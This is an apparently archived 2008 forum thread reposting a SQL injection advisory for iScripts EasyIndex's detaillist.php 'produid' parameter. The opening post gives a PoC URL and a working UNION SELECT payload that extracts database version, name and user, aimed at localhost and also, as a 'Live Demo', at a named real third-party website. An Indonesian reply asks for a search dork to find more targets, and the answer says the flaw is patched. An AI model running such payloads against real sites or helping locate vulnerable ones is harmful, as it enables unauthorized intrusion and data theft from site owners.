Thread subject: Explore Your Brain :: iScripts EasyIndex (produid) Remote SQL Injection Discovered By SirGod

Posted by EVA-00 on 17-09-2008 06:45
#1
##############################################################
[+] Discovered By SirGod
[+] wWw.MorTal-TeaM.OrG
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke
##############################################################
[+] Remote SQL Injection


PoC :

http://[target]/[path]/detaillist.php?produid=[SQL]


Example :

http://127.0.0.1/iscripts/detaillist.php?produid=-1 union all
select 1,2,3,4,version(),database(),user(),8,9,10,11,12,13,14--


Live Demo :

http://www.dawsonvalley.net/business/detaillist.php?produid=-1
union all select
1,2,3,4,version(),database(),user(),8,9,10,11,12,13,14--


- Note : the number of colums can vary.


##############################################################

# milw0rm.com [2008-09-16]
Edited by EVA-00 on 17-09-2008 06:46

Posted by squatter7 on 22-02-2009 07:21
#2
@kk ^

leh minta dork nya gag buat exploit di atas??

Posted by EVA-00 on 22-02-2009 20:10
#3
PErcuma, udah di patch abis-abisan bro, ngedork jg udah gak ada sisa. :victory: